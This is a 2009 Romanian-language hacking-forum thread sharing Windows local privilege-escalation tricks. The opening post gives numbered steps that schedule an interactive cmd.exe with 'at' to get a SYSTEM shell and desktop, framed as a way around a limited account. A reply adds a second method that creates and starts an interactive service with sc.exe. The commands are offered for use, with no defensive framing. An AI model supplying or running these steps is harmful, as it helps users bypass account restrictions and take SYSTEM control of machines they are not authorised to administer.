adonisslanic Posted November 18, 2009 Report Posted November 18, 2009 (edited) Recent am inceput sa ma iau de invatat metode de Privilege Escalation, vertical & horizontal PE etc. si am dat de un Privilege Escalation simpist dar care poate va ajuta pe unii... Am testat doar pe XP SP2 si mere sigur pe Windowze-urile mai vechi( 95, 98, millenium, 2000, si ce cretinitati or mai fi). Step 1 -- Deschide CMD Step 2 -- Vezi cat e ceasul Step 3 -- scrie at <ORA> /interactive "cmd.exe" Step 4 -- baga in loc de ORA ora reala cu un minut mai incolo. Exemplu: Daca este ora 16:05 bagi 16:06 . Step 5 -- Asteapta pana apare noul terminal si scrie apoi explorer.exe Step 6 -- Acum ai un desktop de SYSTEM ADMINISTRATOR. Acest PE e bun pentru cei care au cont limitat si vor sa puna Flash Player de exemplu...( cazul unui prieten de-al meu) Scuze dak e prea noobish threadul asta dar nu il vazusem pe RST EDIT: Daca e puneti si voi PE-uri care stiti... Edited November 18, 2009 by adonisslanic BAD MEMORY :( Quote
adonisslanic Posted November 18, 2009 Author Report Posted November 18, 2009 Da cred, de ce nu incerci? Eu nu pot sa incerc ca folosesc de ceva timp Ubuntu... Deci, feel free to try Quote
virusz Posted November 18, 2009 Report Posted November 18, 2009 a mai fost postat: http://rstcenter.com/forum/2857-acessing-hacking-system-account.rstdata viitoare cauta mai bine.... si merge pe toate sistemele ce au at.exe si ai acces la elLE: sau poti incerca: sc.exe create hcksys binpath= "cmd" type= own type= interactdupa care: sc start hcksysnu e nici un deranj... nu ti-am spus in nume de rau Quote
adonisslanic Posted November 18, 2009 Author Report Posted November 18, 2009 Atunci scuze pentru deranj Quote
SENEQ_o Posted November 18, 2009 Report Posted November 18, 2009 (edited) ----------- Edited February 1, 2012 by SENEQ_o Quote
virusz Posted November 18, 2009 Report Posted November 18, 2009 nu ai scris corect ora... dai time in cmd sa vezi cum sa o scrii... si poti verifica cu at tot din cmd sa vezi ce ai adaugat Quote